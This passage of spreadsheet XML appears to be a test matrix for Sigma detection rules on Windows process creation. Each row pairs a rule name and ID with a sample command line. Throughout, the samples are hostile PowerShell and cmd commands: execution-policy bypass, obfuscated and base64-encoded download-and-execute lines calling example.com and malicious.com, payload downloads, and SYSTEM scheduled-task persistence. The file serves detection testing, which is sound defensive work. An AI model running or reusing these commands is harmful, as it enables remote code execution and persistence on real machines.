        <is>
          <t>powershell.exe /"ex" Bypass -f script.ps1</t>
        </is>
      </c>
      <c r="F552" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G552" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H552" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I552" s="43" t="n"/>
      <c r="J552" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K552" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="553" ht="15.75" customHeight="1" s="42">
      <c r="A553" s="43" t="n"/>
      <c r="B553" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C553" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D553" s="44" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E553" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eX Bypass -"File" script.ps1</t>
        </is>
      </c>
      <c r="F553" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G553" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H553" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I553" s="44" t="n"/>
      <c r="J553" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K553" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="554" ht="15.75" customHeight="1" s="42">
      <c r="A554" s="43" t="n"/>
      <c r="B554" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C554" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D554" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E554" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F554" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G554" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H554" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I554" s="44" t="n"/>
      <c r="J554" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K554" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="555" ht="15.75" customHeight="1" s="42">
      <c r="A555" s="43" t="n"/>
      <c r="B555" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C555" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D555" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E555" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object System.Net.WebClient; IEX $wc.DownloadString('http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F555" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G555" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H555" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I555" s="44" t="n"/>
      <c r="J555" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K555" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="556" ht="15.75" customHeight="1" s="42">
      <c r="A556" s="43" t="n"/>
      <c r="B556" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C556" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D556" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E556" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$wc = New-Object System.Net.WebClient; IEX $wc.DownloadString('http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F556" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G556" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H556" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I556" s="43" t="n"/>
      <c r="J556" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K556" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="557" ht="15.75" customHeight="1" s="42">
      <c r="A557" s="43" t="n"/>
      <c r="B557" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C557" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D557" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E557" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; ( $ExecutionContext.InvokeCommand.GetCmdlet( 'Invoke-Expression' ) ) ( (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1') )"</t>
        </is>
      </c>
      <c r="F557" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G557" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H557" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I557" s="43" t="n"/>
      <c r="J557" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K557" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="558" ht="15.75" customHeight="1" s="42">
      <c r="A558" s="43" t="n"/>
      <c r="B558" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C558" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D558" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E558" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; ( $ExecutionContext.InvokeCommand.GetCmdlet( 'Invoke-Expression' ) ) ( (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1') )"</t>
        </is>
      </c>
      <c r="F558" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G558" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H558" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I558" s="43" t="n"/>
      <c r="J558" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K558" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="559" ht="15.75" customHeight="1" s="42">
      <c r="A559" s="43" t="n"/>
      <c r="B559" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C559" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D559" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E559" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "I`EX ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F559" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G559" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H559" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I559" s="44" t="n"/>
      <c r="J559" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K559" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="560" ht="15.75" customHeight="1" s="42">
      <c r="A560" s="43" t="n"/>
      <c r="B560" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C560" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D560" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E560" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "I`EX ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F560" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G560" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H560" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I560" s="44" t="n"/>
      <c r="J560" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K560" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="561" ht="15.75" customHeight="1" s="42">
      <c r="A561" s="43" t="n"/>
      <c r="B561" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C561" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D561" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E561" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "IEX (Invoke-RestMethod -Uri 'http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F561" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G561" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H561" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I561" s="43" t="n"/>
      <c r="J561" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K561" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="562" ht="15.75" customHeight="1" s="42">
      <c r="A562" s="43" t="n"/>
      <c r="B562" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C562" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D562" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E562" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-Expression ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F562" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G562" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H562" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I562" s="43" t="n"/>
      <c r="J562" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K562" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="563" ht="15.75" customHeight="1" s="42">
      <c r="A563" s="43" t="n"/>
      <c r="B563" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parameter_variation</t>
        </is>
      </c>
      <c r="C563" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring</t>
        </is>
      </c>
      <c r="D563" s="44" t="inlineStr">
        <is>
          <t>36210e0d-5b19-485d-a087-c096088885f0</t>
        </is>
      </c>
      <c r="E563" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"WindowStyle" Hidden /"ExecutionPolicy" Bypass -comMAND "Write-Host 'Testing Rule Scope'"</t>
        </is>
      </c>
      <c r="F563" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G563" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H563" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I563" s="44" t="n"/>
      <c r="J563" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K563" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="564" ht="15.75" customHeight="1" s="42">
      <c r="A564" s="43" t="n"/>
      <c r="B564" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parameter_variation</t>
        </is>
      </c>
      <c r="C564" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring</t>
        </is>
      </c>
      <c r="D564" s="44" t="inlineStr">
        <is>
          <t>36210e0d-5b19-485d-a087-c096088885f0</t>
        </is>
      </c>
      <c r="E564" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"WindowStyle" Hidden -"ExecutionPolicy" Bypass -c "Write-Host 'Testing Rule Scope'"</t>
        </is>
      </c>
      <c r="F564" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G564" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H564" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I564" s="43" t="n"/>
      <c r="J564" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K564" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="565" ht="15.75" customHeight="1" s="42">
      <c r="A565" s="43" t="n"/>
      <c r="B565" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parameter_variation</t>
        </is>
      </c>
      <c r="C565" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring</t>
        </is>
      </c>
      <c r="D565" s="44" t="inlineStr">
        <is>
          <t>36210e0d-5b19-485d-a087-c096088885f0</t>
        </is>
      </c>
      <c r="E565" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"WindowStyle" Hidden -EXecutIonPoLIcy Bypass /"Command" "Write-Host 'Testing Rule Scope'"</t>
        </is>
      </c>
      <c r="F565" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G565" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H565" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I565" s="44" t="n"/>
      <c r="J565" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K565" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="566" ht="15.75" customHeight="1" s="42">
      <c r="A566" s="43" t="n"/>
      <c r="B566" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C566" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D566" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E566" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "&amp; 'C:\Users\Default\AppData\\Local\\payload.ps1'\"</t>
        </is>
      </c>
      <c r="F566" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G566" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H566" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I566" s="43" t="n"/>
      <c r="J566" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K566" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="567" ht="15.75" customHeight="1" s="42">
      <c r="A567" s="43" t="n"/>
      <c r="B567" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C567" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D567" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E567" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "&amp; 'C:\Users\Default\AppData\\Local\\payload.ps1'\"</t>
        </is>
      </c>
      <c r="F567" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G567" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H567" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I567" s="43" t="n"/>
      <c r="J567" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K567" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="568" ht="15.75" customHeight="1" s="42">
      <c r="A568" s="43" t="n"/>
      <c r="B568" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C568" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D568" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E568" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; {Invoke-Expression (Get-Content $env:APPDATA\script.ps1 -Raw)}"</t>
        </is>
      </c>
      <c r="F568" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G568" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H568" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I568" s="44" t="n"/>
      <c r="J568" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K568" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="569" ht="15.75" customHeight="1" s="42">
      <c r="A569" s="43" t="n"/>
      <c r="B569" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C569" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D569" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E569" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SUVYIChHZXQtQ29udGVudCBDOlxVc2Vyc1xQdWJsaWNcQXBwRGF0YVxMb2NhbFxwYXlsb2FkLnBzMSk=</t>
        </is>
      </c>
      <c r="F569" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G569" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H569" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I569" s="44" t="n"/>
      <c r="J569" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K569" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="570" ht="15.75" customHeight="1" s="42">
      <c r="A570" s="43" t="n"/>
      <c r="B570" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C570" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D570" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E570" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc SUVYIChHZXQtQ29udGVudCBDOlxVc2Vyc1xQdWJsaWNcQXBwRGF0YVxMb2NhbFxwYXlsb2FkLnBzMSk=</t>
        </is>
      </c>
      <c r="F570" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G570" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H570" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I570" s="44" t="n"/>
      <c r="J570" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K570" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="571" ht="15.75" customHeight="1" s="42">
      <c r="A571" s="43" t="n"/>
      <c r="B571" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C571" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D571" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E571" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SUVYIChHZXQtQ29udGVudCBDOlxVc2Vyc1xQdWJsaWNcQXBwRGF0YVxMb2NhbFxwYXlsb2FkLnBzMSk=</t>
        </is>
      </c>
      <c r="F571" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G571" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H571" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I571" s="44" t="n"/>
      <c r="J571" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K571" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="572" ht="15.75" customHeight="1" s="42">
      <c r="A572" s="43" t="n"/>
      <c r="B572" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C572" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D572" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E572" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F572" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G572" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H572" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I572" s="44" t="n"/>
      <c r="J572" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K572" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="573" ht="15.75" customHeight="1" s="42">
      <c r="A573" s="43" t="n"/>
      <c r="B573" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C573" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D573" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E573" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F573" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G573" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H573" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I573" s="44" t="n"/>
      <c r="J573" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K573" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="574" ht="15.75" customHeight="1" s="42">
      <c r="A574" s="43" t="n"/>
      <c r="B574" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C574" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D574" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E574" s="44" t="inlineStr">
        <is>
          <t>powershell -"c" "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F574" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G574" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H574" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I574" s="43" t="n"/>
      <c r="J574" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K574" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="575" ht="15.75" customHeight="1" s="42">
      <c r="A575" s="43" t="n"/>
      <c r="B575" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C575" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D575" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E575" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F575" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G575" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H575" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I575" s="43" t="n"/>
      <c r="J575" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K575" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="576" ht="15.75" customHeight="1" s="42">
      <c r="A576" s="43" t="n"/>
      <c r="B576" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C576" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D576" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E576" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F576" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G576" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H576" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I576" s="43" t="n"/>
      <c r="J576" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K576" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="577" ht="15.75" customHeight="1" s="42">
      <c r="A577" s="43" t="n"/>
      <c r="B577" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C577" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D577" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E577" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F577" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G577" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H577" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I577" s="43" t="n"/>
      <c r="J577" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K577" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="578" ht="15.75" customHeight="1" s="42">
      <c r="A578" s="43" t="n"/>
      <c r="B578" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_webclient_casing</t>
        </is>
      </c>
      <c r="C578" s="44" t="inlineStr">
        <is>
          <t>Net WebClient Casing Anomalies</t>
        </is>
      </c>
      <c r="D578" s="44" t="inlineStr">
        <is>
          <t>c86133ad-4725-4bd0-8170-210788e0a7ba</t>
        </is>
      </c>
      <c r="E578" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" TgBlAHcALQBPAGIAagBlAGMAdAAgAG4AYABFAHQALgBXAGABRQBiAEMAbABpAEUAbgBUAA==</t>
        </is>
      </c>
      <c r="F578" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G578" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H578" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I578" s="44" t="n"/>
      <c r="J578" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K578" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="579" ht="15.75" customHeight="1" s="42">
      <c r="A579" s="43" t="n"/>
      <c r="B579" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_appdata_local_system</t>
        </is>
      </c>
      <c r="C579" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Execution AppData Folder</t>
        </is>
      </c>
      <c r="D579" s="44" t="inlineStr">
        <is>
          <t>c5c00f49-b3f9-45a6-997e-cfdecc6e1967</t>
        </is>
      </c>
      <c r="E579" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\..\Admin\AppData\Local &amp;&amp; schtasks /Create /TN "UpdateTask" /TR "payload.exe" /SC ONSTART /RU SYSTEM"</t>
        </is>
      </c>
      <c r="F579" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G579" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H579" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I579" s="44" t="n"/>
      <c r="J579" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K579" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="580" ht="15.75" customHeight="1" s="42">
      <c r="A580" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B580" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_data_exfiltration_via_cli</t>
        </is>
      </c>
      <c r="C580" s="44" t="inlineStr">
        <is>
          <t>Potential Data Exfiltration Activity Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D580" s="44" t="inlineStr">
        <is>
          <t>7d1aaf3d-4304-425c-b7c3-162055e0b3ab</t>
        </is>
      </c>
      <c r="E580" s="44" t="inlineStr">
        <is>
